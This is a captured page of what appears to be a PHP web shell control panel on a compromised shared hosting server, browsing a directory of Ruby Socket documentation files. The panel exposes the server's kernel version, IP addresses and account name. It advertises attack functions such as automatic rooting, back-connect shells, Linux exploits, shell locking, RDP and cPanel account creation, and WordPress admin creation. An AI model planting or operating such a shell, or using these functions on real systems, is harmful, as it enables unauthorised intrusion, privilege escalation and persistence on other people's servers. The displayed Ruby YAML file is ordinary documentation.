Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
Socket /
[ HOME SHELL ]
Name
Size
Permission
Action
Constants
[ DIR ]
drwxr-xr-x
accept-i.yaml
5.59
KB
-rw-r--r--
accept_nonblock-i.yaml
2.12
KB
-rw-r--r--
bind-i.yaml
6.09
KB
-rw-r--r--
cdesc-Socket.yaml
2.29
KB
-rw-r--r--
connect-i.yaml
8.77
KB
-rw-r--r--
connect_nonblock-i.yaml
1.76
KB
-rw-r--r--
getaddrinfo-c.yaml
5.88
KB
-rw-r--r--
gethostbyname-c.yaml
3.81
KB
-rw-r--r--
getservbyname-c.yaml
729
B
-rw-r--r--
listen-i.yaml
5.04
KB
-rw-r--r--
recvfrom-i.yaml
7.38
KB
-rw-r--r--
recvfrom_nonblock-i.yaml
2.66
KB
-rw-r--r--
sysaccept-i.yaml
1.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cdesc-Socket.yaml
--- !ruby/object:RI::ClassDescription attributes: [] class_methods: - !ruby/object:RI::MethodSummary name: getaddrinfo - !ruby/object:RI::MethodSummary name: gethostbyname - !ruby/object:RI::MethodSummary name: getservbyname comment: - !ruby/struct:SM::Flow::P body: Class <tt>Socket</tt> provides access to the underlying operating system socket implementations. It can be used to provide more operating system specific functionality than the protocol-specific socket classes but at the expense of greater complexity. In particular, the class handles addresses using +struct sockaddr+ structures packed into Ruby strings, which can be a joy to manipulate. - !ruby/struct:SM::Flow::H level: 3 text: Exception Handling - !ruby/struct:SM::Flow::P body: Ruby's implementation of <tt>Socket</tt> causes an exception to be raised based on the error generated by the system dependent implementation. This is why the methods are documented in a way that isolate Unix-based system exceptions from Windows based exceptions. If more information on particular exception is needed please refer to the Unix manual pages or the Windows WinSock reference. - !ruby/struct:SM::Flow::H level: 3 text: Documentation by - !ruby/object:SM::Flow::LIST contents: - !ruby/struct:SM::Flow::LI label: "*" body: Zach Dennis - !ruby/struct:SM::Flow::LI label: "*" body: Sam Roberts - !ruby/struct:SM::Flow::LI label: "*" body: <em>Programming Ruby</em> from The Pragmatic Bookshelf. type: :BULLET - !ruby/struct:SM::Flow::P body: Much material in this documentation is taken with permission from <em>Programming Ruby</em> from The Pragmatic Bookshelf. constants: - !ruby/object:RI::Constant comment: name: AF_INET6 value: Object.new full_name: Socket includes: [] instance_methods: - !ruby/object:RI::MethodSummary name: accept - !ruby/object:RI::MethodSummary name: accept_nonblock - !ruby/object:RI::MethodSummary name: bind - !ruby/object:RI::MethodSummary name: connect - !ruby/object:RI::MethodSummary name: connect_nonblock - !ruby/object:RI::MethodSummary name: listen - !ruby/object:RI::MethodSummary name: recvfrom - !ruby/object:RI::MethodSummary name: recvfrom_nonblock - !ruby/object:RI::MethodSummary name: sysaccept name: Socket superclass: Object
Close